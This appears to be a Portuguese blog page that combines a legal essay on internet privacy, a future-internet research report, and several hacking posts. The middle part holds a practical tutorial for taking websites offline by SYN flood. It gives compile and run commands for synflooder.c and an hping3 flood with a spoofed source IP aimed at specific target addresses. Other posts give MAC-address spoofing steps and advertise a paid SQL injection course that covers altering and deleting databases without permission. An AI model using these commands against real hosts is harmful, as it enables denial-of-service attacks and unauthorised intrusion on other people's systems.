invasão de privacidade na internet é crime

Na virada do terceiro milênio, dois acontecimentos foram notoriamente marcantes em nossa história contemporânea. Uma delas fora a globalização, que avançou fronteiras e possibilitou o intercâmbio de novas experiências econômicas comerciais e tecnológicas. Outro marco inevitável foi o advento da internet que acelerou e democratizou o acesso e o tráfico de informações em todo globo terrestre.  Um indiano em uma velocidade instantânea consegue trocar dados ilimitados ou se comunicar com um australiano em outro continente em questão de segundos sem ao menos sair de casa, ambos usando um computador e um servidor de acesso para efetuar esse procedimento.

Em 1969, meados da guerra fria, o projeto militar ARPANET da agência de projetos avançados (ARPA) do Departamento de Defesa norte-americano confiou em 1969 à Rand Corporation, um sistema de telecomunicações que garantisse que um ataque russo não interrompesse as comunicações dos EUA (1). Em 1989 nasceu a WWW (World Wide Web), ou simplesmente teia de alcance mundial compostos por hipertextos onde se transformou numa nova ferramenta de comunicação e avanço na aldeia global , chegando à marca de 800 milhões de usuários navegando pela Internet até 2004 (2). A Internet teve seu boom em 1998, podendo ser definido como uma ampla rede que conecta um ilimitado número de computadores em todo o planeta. Depois dessa rápida introdução, passaremos a comentar sinteticamente sobre o tema Intimidade e Privacidade. Ora a intimidade como a privacidade, estão inseridos no direito de personalidade, que são divididos em 03 (três) espécies: os direitos físicos, direitos psíquicos e direitos morais.
Um grande unanimidade de juristas comungam que o marco teórico acerca do direito à intimidade teve origem com a dupla de advogados anglo-americanos Samuel D. Warren e Louis D. Brandeis com seu famoso artigo intitulado como “The right of privacy” (o  direito à privacidade), publicado na Havard Law Review em 15 de dezembro de 1890 (3). Tal artigo se preocupava em determinar um princípio legal para dar guarida a intimidades das pessoas haja vista o uso não autorizado de fotografias. Sem embargo, Brandeis e Warren para aperfeiçoarem seus estudos adquiriram a expressão “right to be alone” (direito de ser deixado em paz) da autoria do juiz norte-americano Cooley, de sua obra publicada em 1873 (The Elements of torts) onde ele se referia ao “direito de estar só” (3), com vistas à proteção da pessoa e para a segurança do indivíduo (4).

Na Declaração Universal dos Direitos Humanos, proclamada pela ONU, em 1948, o art. 12 tem a seguinte redação: “Ninguém será sujeito a interferências na sua vida privada, na sua família, no seu lar ou na sua correspondência nem a ataques à sua honra e à sua reputação. Toda pessoa tem direito à proteção da lei contra tais interferências ou ataques”.

No Brasil, a nossa atual Constituição Federal (1988) remete-nos ao artigo 5º, inciso X, que de maneira explícita descreve, que são invioláveis a honra, a intimidade, a vida privada e a imagem das pessoas, sendo assegurado o direito à indenização pelo dano material ou dano moral decorrente da violação desses direitos. Visualizando um círculo, a vida privada seria ele, e a intimidade o seu núcleo. Um o gênero, o outro a espécie.
Depois dessa brevíssima análise da origem da Internet e do princípio fundamental da inviolabilidade da intimidade e da vida privada, passamos a discutir sobre a invasão da privacidade através do “mal” uso da internet.

Uma das maiores celeumas gira em torno do SPAM, abreviatura de “Spiced Ham – presunto picante” que se originou de um seriado (Monty Python) dos anos 80 onde humoristas ingleses bolaram um quadro em que uma garçonete oferecia o produto incessantemente, se assemelhando ao Spam. Não demorou muito para fossem batizadas com esse nome (5). O Spam é definido como aquelas mensagens indesejadas que são enviadas à sua caixa postal diariamente, sem a sua autorização. O pior é que não se sabe como tais mensagens conseguiram chegar a sua caixa postal. Propagandas de toda ordem, correntes da sorte, remédios como Viagra, aumento peniano, empréstimos, são os spams que mais circulam nos webmails ou dentro do Outlook Express. Desde que o usuário autorize o envio de mensagens, a título didático, informativo ou comercial, a operação é permitida, apesar, de sempre existirem abusos, onde a privacidade e a intimidade das pessoas são invadidas hodiernamente.

Um exemplo de invasão de ordem privada seria a violação de correspondência. As mensagens eletrônicas ou e-mails, até chegarem ao seu verdadeiro destinatário, podem ser passíveis de prévia leitura e até adulteração. Existe uma corrente doutrinária que ressalta que o e-mail equivale ao cartão-postal, pois, também vem aberto, sendo visível a qualquer pessoa, não se tratando então, de violação de correspondência. Já outra corrente diz que violar correspondência (de qualquer natureza) de outrem é crime, fazendo referência ao artigo 151 do Código Penal que reza: “Devassar indevidamente o conteúdo de correspondência fechada, dirigida a outrem”.  Assegurado pela Carta Política também dispõe, em seu artigo 5º, inciso XII: “É inviolável o sigilo da correspondência e das comunicações telegráficas, de dados e das comunicações telefônicas, salvo, no último caso por ordem judicial, nas hipóteses e na forma que a lei estabelecer para fins de investigação criminal ou instrução processual penal.”

Outro caso nítido de invasão de privacidade são os Cookies. Os cookies  consistem em arquivos gravados pelo servidor no disco rígido do usuário, os quais armazenam informações sobre os hábitos do mesmo. Toda vez que o internauta acessa uma home-page, esse endereço fica gravado no banco dados do servidor. Até aí não existe óbice nenhum, o problema é que os cookies podem ser usados com outra destinação, qual seja, o meramente mercadológico. Através do cruzamento de banco de dados, empresas compram dos provedores informações essenciais, chamados de “dados sensíveis” para remeterem suas propostas comerciais devassando a vida privada e/ou a sua intimidade de outrem, onde o usuário não imagina como tal empresa levantou esses dados ou conhece tão a fundo suas preferências íntimas. Essas informações são utilizadas para traçar o perfil do potencial consumidor que ora se desperta nesse novo veículo de comunicação e comercialização.

Questão polêmica é a invasão nas Salas de bate-papo e chats. Dentro daquela sala se instala uma conversa em tempo-real entre pessoas com afinidades e assuntos específicos onde trocam informações sobre suas vidas privadas e a intimidade de cada um. O problema surge quando um estranho invade aquela sala, impedindo o fluxo de comunicação, observando sem ser observado, ou até invadindo a conversa alheia sem ser convidado.
Existe também a invasão de privacidade pelas empresas aos seus empregados. Nessas empresas, funcionários trocam e-mails entre eles, entram em salas de bate-papo, “baixam” arquivos, fazem pesquisas, compras, pagam contas, dentro do local de trabalho, utilizando-se dos recursos da empresa para afazeres pessoais. O problema ocorre quando as empresas começam a fiscalizar seus empregados através desse mal-uso da Internet. Instalam-se senhas, softwares de bloqueio, políticas de controle, para tentar minimizar os prejuízos causados pelos mesmos, pois o uso indevido e freqüente da Internet nos locais de trabalho pode ensejar diversos problemas dessa alçada, desde a queda do rendimento dos funcionários, atraso no envio e recebimento de dados, custos desnecessários com energia elétrica, provedor, conta telefônica, ocasionado até desfazimento de negócios, por causa das linhas ocupadas, no caso de acesso discado, e.g.

Na solução dos problemas mencionados, existe a saída técnica através de filtros potentes, firewalls, op-outs (spams), políticas de controle, e ultimamente a criptografia, interagindo sempre com o profissional de informática ou o técnico de sistema de informação. Contudo, a necessidade legislativa é patente, não só a nível nacional, como mundial. Três linhas de pensamento se deságuam entre os juristas e profissionais de direito de informática. A primeira onde ressalta que se o ordenamento jurídico (leis e códigos) vigente já serie suficiente para tratar dos problemas que surgirem dentro do âmbito da net ou com o uso dela (como uma ferramenta no alcance de seus objetivos). A segunda corrente só se satisfaria com uma nova legislação específica ou um “Código de Informática” para tratar a cerca dos palpitantes temas que se originam dia a dia no direito digital, dentre eles a invasão de privacidade informática. E, uma terceira, entende que deveria ser adotada uma Codificação Informática Internacional, através da unificação de tratados e convenções para se almejar um consenso globalizado no que tange à efetiva aplicabilidade das leis, esferas de competência, visando a proteção dos usuários a todo tipo de ataque ou turbação à intimidade e privacidade através do meio eletrônico.

Mais importante do que a implantação de softwares de última geração, sistemas de proteção, uma criptografia forte e/ou uma efetiva regulamentação, é a prevalência de uma de nossas maiores conquistas no capítulo da história dos direitos fundamentais, qual seja, o princípio da dignidade da pessoa humana estatuído no inciso III, do artigo 1º, da Magna Carta. Tal postulado deve ser o fio condutor de todas as relações dos indivíduos dentro e fora da Internet, sempre primando pelo pudor ao próximo e o respeito às condições mínimas inerentes à personalidade e conduta humana, dependendo do caso, até sacrificando e abrindo mão de instrumentos tecnológicos perversos com intuito de constranger e violar a intimidade do indivíduo e retroceder o inevitável progresso da humanidade.

Guilherme Tomizawa é Advogado. Bacharel em Administração e Direito pela UTP – PR. Especialista em Direito de Família pela PUC – PR. Mestre em Direito pela UGF – RJ. Professor de Direito Civil da OPET. Membro do Instituto Brasileiro de Direito Eletrônico. Publicou em 2008 o livro “A invasão de privacidade através da internet pela JM Editora. E-mail: gtadvocacia@hotmail.com

Artigo publicado no Caderno de Direito e Justiça, no Jornal “O Estado do Paraná”, dia 10/10/2004, p.11.

Notas:

(1) Cf. PAESANI, Liliana Minardi. “Direito e Internet – liberdade de informação, privacidade e responsabilidade civil. Editora Atlas S/A. São Paulo. 2000. p.25

(2) Revista VEJA. Editora Abril. Edição 1874. Ano 37. nº 40. 06/10/2004, “A Vida Sem Fio” p.102

(3) Cf. FARIAS. Edilsom Pereira de. Colisão de Direitos. Porto Alegre; Sérgio Antônio de Fabris Editor. 1996. p.112/113.

(4) Cf. TEPEDINO, Gustavo. Problemas de direito constitucional. Editora Renovar. 2ª tiragem. Rio de Janeiro. 2001. p.111/112

(5) Revista Super Interessante. Editora Abril. Edição nº 203.Set/2004.“O que há por trás desse SPAM?”. p.49

como derrubar um site do ar

como derrubar um site do ar – Introdução ao ataque com synflooder.c
Iae galera, vou demostrar como realizar um ataque SYN Flood pra derrubar sites (hosts), quem não conhece muito SYN Flood, recomendo que leia mais sobre o mesmo.

Eu usarei 2 metodos para realizar o ataque, um será  usando a ferramenta synflooder.c outro sera usando o hping3 para derrubar um site do ar ( hacker )

Você pode baixar o hping no link abaixo:
synflooder.c —> http://www.4shared.com/file/119205535/bd36c580/SYN_Floodertar.html
hping —> http://www.hping.org/download.html

Obs: Para quem usa Debian, é muito fácil de instalar basta digitar:
# apt-get install hping3

Para quem usa OpenSUSE basta digitar:
# yast install hping3

Para quem usa Fedora basta digitar:
# yum install hping3
——————————————————————————————-

Agora o primeiro passo para realizar o ataque com o synflooder.c é compila-lo:
# gcc  synflooder.c -o synflooder

Obs: geralmente as pessoas reclaman de dar erro na compilação, uns merda… Pois, basta pegar algumas biblilhotecas que estarão faltando em alguns casos.

# ./synflooder

Gimme: ./synflooder <host> <port>
# ./synflooder 189.23.199.200 80

Connected No: 0
Connected No: 1
Connected No: 2
Connected No: 3
Connected No: 4
Connected No: 5
Connected No: 6
Connected No: 7
Connected No: 8
Connected No: 9
Connected No: 10
Connected No: 11
Connected No: 12
Connected No: 13
Connected No: 14
Connected No: 15
Connected No: 16

Depois de um tempo o site ficara impossibilitado de receber mais conexões e qualquer pessoa que tentar entrar no site, simplesmente não ira conseguir.

Obs: na minha opniao este ataque serve somente para passar medo em alguma pessoa, pois o servidor so fica fora do ar por alguns minutinhos básicos.
———————————————————————————————

ataque com HPING3

O hping3 é um programa muito util, pode ser usado para manipular o cabeçalho TCP/IP. Sera exatamente isto que vamos fazer, primeiro vamos spoofar o IP e floodar o alvo.

Atacando
O comando usado sera este:
hping3 –flood –syn -a ip_falso -e “Message” -S -s porta ip_alvo

Então no konsole vamos fazer assim:
#hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

O resultado sera que o alvo ira ficar OFF:
# hping3 –flood –syn -a 123.123.123.123 -e “Dreamexplo” -S -s 80 201.40.22.164

HPING 201.40.22.164  (ppp0 201.40.22.164): S set, 40 headers + 16 data bytes

[main] memlockall(): Success

Warning: can’t disable memory paging!

hping in flood mode, no replies will be shown

———————————————————————————————–

Espero que tenham gostado do tutorial.

ESTE FOI O TUTORIAL PRATICO. VOU CRIAR AGORA O TUTORIAL ESPLICATIVO QUE É O MAIS IMPORTANTE.

seguranca em redes de computadores

seguranca em redes de computadores é muito importante nos dias de hoje, pois os crackers estão a solta e nossa equipe de seguranca m rede pode cuidar de sua seguranca, pois somos especialistas em segurança da informação na web.

Por favor entren no link:

http://www.segurancaemrede.com/2011/11/especialistas-em-seguranca-da-informacao/

e Veja nossas promoções para a seguranca de seu site, sistema, software em geral.

FORMAS DE PAGAMENTO

PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nas duas contas:  juancarloscunha606@hotmail.com

consultoria em seguranca da informação

Olá a todos,

prestamos consultoria em segurança da informação via web – as pessoas que possuem sites ou sistemas, estamos com uma proposta para testar a seguranca do seu site/sistema.

Para saber em relação aos preços, podem entrar na pagina:

http://www.segurancaemrede.com/2011/11/especialistas-em-seguranca-da-informacao/

consultoria em seguranca da informação

especialistas em segurança da informação

Somos especialistas em segurança da informação na web, as pessoas que possuem sites ou sistemas, estamos com uma proposta para testar a seguranca do seu site/sistema.

Estamos cobrando 39,00 para verificar falhas de seguranca em seu site.

Para as pessoas que si interessarem, podem entrar em contato através do email: juancarloscunha606@hotmail.com

envie-nos a URL de seu site e faça um teste driver.

Como funciona:
Você passa as URL’s de seu site para nós testar-mos.
encontraremos os bugs em seu site. Para cada site, cobramos R$ 39,00.

Para mostrar-mos a falha, cobramos o valor de R$14,00 por cada falha(falaremos a falha e você irá resolver), Agora caso queira que nós resolva seu problema isso terá que ser orçado a partir de seu codigo fonte.

Aconselho, você testar em somente 1, pois provavelmente as mesmas falhas que estiverem em um terá tambem nos outros.

FORMAS DE PAGAMENTO

PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nos dois: juancarloscunha606@hotmail.com

By: especialistas em segurança da informação

testar vulnerabilidade de site valor-para-teste

testar vulnerabilidade de site(valor para teste)- Para as pessoas que possuem site, estamos com uma proposta para testar a seguranca do seu site.

Estamos cobrando 39,00 para verificar falhas de seguranca em seu site.

Para as pessoas que si interessarem, podem entrar em contato através do email: juancarloscunha606@hotmail.com

envie-nos a URL de seu site e faça um teste driver.

Como funciona:
Você passa as URL’s de seu site para nós testar-mos.
encontraremos os bugs em seu site. Para cada site, cobramos R$ 39,00.

Para mostrar-mos a falha, cobramos o valor de R$14,00 por cada falha(falaremos a falha e você irá resolver), Agora caso queira que nós resolva seu problema isso terá que ser orçado a partir de seu codigo fonte.

Aconselho, você testar em somente 1, pois provavelmente as mesmas falhas que estiverem em um terá tambem nos outros.

FORMAS DE PAGAMENTO

PAYPAL ou PAGSEGURO -> nosso usuario é o mesmo nos dois: juancarloscunha606@hotmail.com

By: http://www.segurancaemrede.com

como alterar mac do computador ou clonar mac da placa de rede

Como alterar mac do computador ou clonar mac da placa de rede – Para fazer isso, você pode usar o metodo manual no link ao lado: ryan.com.br/wp/mudar-mac-address

Ou quem precisa disse todos os dias e nao usa linux, pode usar o programa abaixo para windows.

MACshift – Open Source – Só pode ser usado por linha de comando. Só funciona no Windows XP.

1  -  Descompacte o programa jogue os dados para o c:/windows/

2 -   para mac aleatoria, abra o CMD, e digite o  comando: macshift -i "Wireless" -d

2 -   para mac fixada: macshift -i "Wireless" 11223344566

3 -  Reinincie seu pc e tudo funcionará

Agora para quem usa linux ubuntu.

Você só tem que fazer com que esse script seja iniciado com o sistema, crie um arquivo com a nome.sh em qualquer lugar, ex: mac.sh , dentro desse arquivo adicione o seguinte conteudo:

#!/bin/sh

ifconfig wlan0 hw ether 00:50:56:c0:00:02

onde wlan0 é a interface de rede,

agora você tem que fazer com que ele seja inicado quando o sistema for iniciado, ai é o seguinte, tem que dar permissão para o arquivo ser iniciado, abra o terminal como root no diretorio onde está o arquivo nome.sh e rode o seguinte comando: chmod +x nome.sh ” esse comando faz com que o arquivo nome.sh possa ser executado “, agora vc tem que adicionar uma linha no arquivo rc.local a linha deve conter o seguinte: /home/invkloip/.net/nome.sh por ex, a linha deve conter o caminho do arquivo, o arquivo rc.local esta dentro do diretorio /etc/rc.d/

só isso!

Apostila com Técnicas de invasao com sql injection

Criei uma apostila com uma serie de tecnicas para excução do famoso sql injection.

Abaixo está alguns dos assuntos abordados na apostila.

COMO COMPRAR ?

Para conseguir esta apostila Basta fazer um deposito pelo pagseguro na conta do juancarloscunha606@hotmail.com, que logo após enviarei usuario e senha da area restrita para fazer download da apostila.

COMO VOU APRENDER ?

Eu auxiliarei a todos no estudo, e disponibilizarei auvos vulneraveis a ataques.

ASSUNTOS SOBRE O APOSTILA.

Mysql básico

Criando uma query

Principio do sqlinjection

O que é sqlinjection

Teoria de sqlinjection

Regras sqlinjection

Criando um sistema de login E senha para testes

Listar dados do banco de dados com sqlinjection

Burlar uma query

Burlar um sistema de login e senha

Conseguir acesso ao banco de dados

Conseguir privilégios em um sistema

Conseguir dados de um sistema

Usando parâmetro UNION

Inserindo dados no banco de dados sem permissão

Alterando dados do banco de dados sem permissão

Excluindo dados do banco de dados sem permissão

Excluindo tabelas do banco de dados sem permissão

Excluindo database sem permissão

Descobrir nomes de tabelas do banco de dados

Descobrir nome das colunas do banco de dados

Protegendo sistema de login e senha

Protegendo dados do banco

Proteção na query

Emunizando site, sistema… do sqlinjection

Para você aprender com precisão este curso você precisa de saber:

Básico em linguagem de programação

Básico em banco de dados

O que é owasp, top 10 da seguranca em rede

O

que é owasp ( Open Web Application Security Project ) a top 10 da seguranca em rede -  é uma comunidade aberta dedicada a capacitar as organizações para conceber, desenvolver, adquirir, operar e manter aplicações que podem ser confiáveis. Todas as ferramentas OWASP, documentos, fóruns, e os capítulos são gratuitas e abertas a qualquer pessoa interessada em melhorar a segurança do aplicativo

Foi disponiilizado para a comunidade o RC1 ( Release Candidate ) do Top 10 Critical Riscos Web Application Security.

O OWASP Top Ten representa um amplo consenso sobre o que o mais crítico na web são as falhas de segurança do aplicativo. Esta lista é poduzida por membros do projeto incluindo vários especialistas em segurança de todo o mundo que compartilharam seus conhecimentos.

Este projeto é extremamente significativo para a indústria de segurança de aplicativos, uma vez que exerce influência sobre o PCI-DSS, a política global, conscientização do desenvolvedor, e direcionamento do produto.

Notáveis mudanças foram feitas a partir da versão 2007 para ajudar as organizações na visualização, compreensão e solução desses problemas.

Agora é o momento para a comunidade de segurança do aplicativo de enviar os seus comentários para tornar a lista o melhor que pode possivelmente até o final do ano, quando será ratificado.

Evolução do IP vs Clean Slate, o que é clean slate, Qual será o futuro da internet?

E

Uma das discussões centrais destes dois dias de evento foi em torno da forma que a rede terá no futuro. Há pesquisadores que defendem que uma nova Internet deve ser criada, ou seja, que deve-se abandonar o protocolo IP, sobre o qual está fundamentada a Internet atual, e desenvolver uma base inteiramente nova sobre a qual a rede passará a funcionar. Esta idéia de “recomeçar a Internet do zero” é conhecida entre os pesquisadores como Clean Slate, ou arquitetura disruptiva.

Os que pensam desta forma argumentam que a Internet como conhecemos foi criada há aproximadamente 30 anos, com o objetivo de atender um público restrito (cientistas e pesquisadores). Hoje, entretanto, a mesma estrutura básica é usada mundialmente por centenas de milhões de pessoas que enviam, consultam e recebem cada vez mais informações (de texto, de imagens, de áudio, de vídeo etc). Como a rede não foi a princípio preparada para isto, os novos aplicativos que surgiram ao longo dos anos foram sendo “ajustados” a rede de maneira desordenada. Atualmente, portanto, a Internet seria constituída por vários “remendos”, responsáveis por uma série de vulnerabilidades, instabilidades, incompatibilidades e outros problemas da rede. Os defensores do Clean Slate argumentam que uma Internet recalculada do zero seria mais robusta e confiável, com maior flexibilidade e facilidade de administração.

Os que defendem o IP argumentam que este protocolo vem funcionando satisfatoriamente nos últimos 30 anos e que, embora uma mudança na Internet seja necessária, ela partirá de uma evolução do próprio IP, e não de uma ruptura com ele. Vale ressaltar que estas visões não são totalmente excludentes: além de ser possível que o novo desenho seja baseado em uma adaptação do protocolo IP (e não uma ruptura completa com este), é possível, ainda, que o IP seja agregado a uma nova estrutura, mesmo que ela não tenha este protocolo como base.

Aparentemente há um consenso entre os pesquisadores de que as mudanças estruturais na Internet (ocorram elas em decorrência de uma evolução do IP ou a partir de um redesenho da arquitetura), ainda devem ser amplamente discutidas durante a próxima década. Isto pois embora todos concordem que a Internet precisa passar por profundas mudanças, ainda não se tem estabelecida nenhuma solução concreta. Desta forma, o workshop do CPqD incluiu também palestras sobre possíveis soluções para alguns dos problemas pontuais da rede, assim como apresentações sobre possibilidades de novas aplicações para a Internet atual e futura.

Problemas e possíveis soluções

Além das questões relativas às redes experimentais, o workshop contou ainda com palestras sobre diversos outros fatores que gravitam em torno do tema “Futuro da Internet”, tais como: desafios e tendências em segurança; questões em torno da mobilidade crescente dos dispositivos conectados a Internet; possibilidades para separar identificação e localização; hiperconectividade; novos requisitos na engenharia de tráfego e gerenciamento de recursos; monitoramento de redes; soluções ópticas para o aumento da sustentabilidade energética das redes, entre outros.

Um dos temas apresentados no evento diz respeito aos ambientes experimentais para o teste das novas soluções para a Internet, importante tanto quando se fala da rede do futuro, quanto quando se fala das redes atuais. Embora muitos pesquisadores concordem que em muitos casos estes ambientes (também conhecidos como testbeds) não dão a medida exata do que ocorre em situações reais, a necessidade deles é não somente inegável, como também crescente, dado o número cada vez maior de aplicações para a Internet.

A palestra do diretor de Inovação da RNP, Michael Stanton, teve como tema justamente os ambientes de suporte para trabalhos de Pesquisa e Desenvolvimento (P&D) experimentais em redes e aplicações distribuídas.

Stanton descreveu a evolução desses ambientes, que podem ser infraestruturas físicas ou virtuais, bem como a maneira como o suporte é dado. Além das atividades já realizadas no Brasil, ele também examinou o contexto de algumas redes experimentais usadas no exterior, especialmente as relacionadas ao futuro desenvolvimento da Internet.

No cenário internacional, o diretor de Inovação da RNP destacou o PlanetLab, uma infraestrutura mundial para a realização de pesquisas em tecnologias e protocolos de aplicações Internet (TCP/IP), atualmente presente em mais de 400 nós espalhados pelo mundo. A contribuição fundamental do PlanetLab para a realização de pesquisa experimental é o uso da virtualização de recursos computacionais nestes nós, permitindo que múltiplas aplicações possam ser instaladas paralelamente em cada nó, e que uma determinada aplicação possa estar presente em uma fração de muitos nós diferentes, o que é chamada de uma “fatia”.

Em 2006, o ambiente PlanetLab foi estendido para permitir experimentos com outras arquiteturas de Internet, além do TCP/IP. Este “meta-testbed” se chama Vini, e permite que os servidores nos nós possam funcionar como roteadores para diversos protocolos. A virtualização dos recursos em Vini inclui também os roteadores e os enlaces entre estes.

O Vini serviu como inspiração para o Global Environment for Network Innovations (Geni), uma iniciativa da norte-americana National Science Foundation (NSF) para criação de um ambiente compartilhado de experimentação que auxilie na validação de novas arquiteturas de redes. O objetivo do Geni é apoiar pesquisas que possam levar a uma futura Internet melhor, com características como maior segurança, integração com tecnologias ópticas e de rádio, maior atratividade econômica, entre outras. Uma das palavras-chave do ambiente Geni é a virtualização, que permite que múltiplas arquiteturas funcionem em uma infraestrutura compartilhada, dando uma representação razoável da complexidade da Internet. Michael falou ainda de outras iniciativas similares ao Geni, como a europeia Future Internet Research & Experimentation (Fire) e a japonesa Akari.

Para concluir, o diretor de Inovação da RNP examinou as perspectivas para montar no Brasil um programa de P&D experimental sobre a Internet do Futuro, com a participação da RNP. Inicialmente falou sobre o projeto Giga, que tratou da implementação de uma rede óptica experimental própria, com de 2,5 Gbps e 735 Km de extensão. A primeira fase do projeto foi oficialmente encerrada em 200. Atualmente, a RNP e o CPqD buscam recursos para continuar mantendo a rede experimental ativa, sendo a proposta da RNP a realização de P&D em arquiteturas novas de rede, visando o futuro da Internet. Além disto, a RNP e quatro universidades formularam em 2008 uma linha de pesquisa experimental em futuras arquiteturas de rede, com base em ambiente inspirado no Vini, para compor o projeto Ciência Web (consórcio liderado pela UFRJ), um dos selecionados no recente edital do INCT (Institutos Nacionais de Ciência e Tecnologia) do CNPq. Nesta proposta a RNP proveria conectividade a longa distância para a rede experimental pretendida.

O uso de Vini neste contexto requereria uma infraestrutura subjacente de camada 2 do modelo OSI, para poder implementar possivelmente múltiplos protocolos de rede (camada 3), sendo IP apenas uma das alternativas. Os atuais planos da RNP são compatíveis com este projeto, com a migração do backbone para tecnologia de rede de camadas 1 e 2, e o uso amplo de Ethernet (camada 2) nas redes metro (pertencentes a iniciativa Redes Comunitárias de Educação e Pesquisa – Redecomep) e nas principais conexões internacionais (Whren-Lila/AtlanticWave). Seria possível, portanto, imaginar que a RNP do futuro pudesse reservar banda para experimentação, isolada do tráfego de “produção”, em toda sua extensão, como é feito em Geni.

Stanton encerrou a apresentação apontando as oportunidades que surgiriam para realizar P&D colaborativos com pesquisadores de outros países se existisse uma rede experimental do tipo Geni no Brasil, que pudesse ser interconectada (federada) com as iniciativas semelhantes em outros países, e notou que as políticas enunciadas por Geni e Fire dão suporte a esta forma de colaboração. Para Stanton, isto permitiria ao Brasil participar no esforço internacional para definir como seria a Internet do Futuro.

Redes híbridas

Outro assunto bastante abordado ao longo do workshop foram as redes híbridas, que se apresentam no cenário acadêmico como uma tendência mundial. Em uma rede híbrida, a mesma infraestrutura de comunicação é usada simultaneamente para prestar serviço de pacotes IP, como opera hoje a rede Ipê, e para circuitos fim-a-fim voltados a aplicações selecionadas. Atualmente, estes circuitos fim-a-fim, que funcionam como canais diretos de transferência de dados entre dois pontos, são configurados manualmente, uma atividade demorada, trabalhosa e sujeita a erros.

A discussão sobre qual é a melhor solução tecnológica para tornar automático o aprovisionamento dos circuitos fim-a-fim, permitindo que ele seja feito sob demanda e de maneira agendada, também foi abordada durante o workshop, assim como diversos outros assuntos relativos às redes híbridas.

Em maio, o projeto Futura RNP, que lança as bases para a próxima a nova rede acadêmica brasileira (possivelmente de arquitetura híbrida), completará um ano. Vale ressaltar que a maioria dos palestrantes que se apresentaram no workshop são parceiros da RNP no Futura RNP.

O futuro da internet está nas maos de quem ?

Fonte: RNP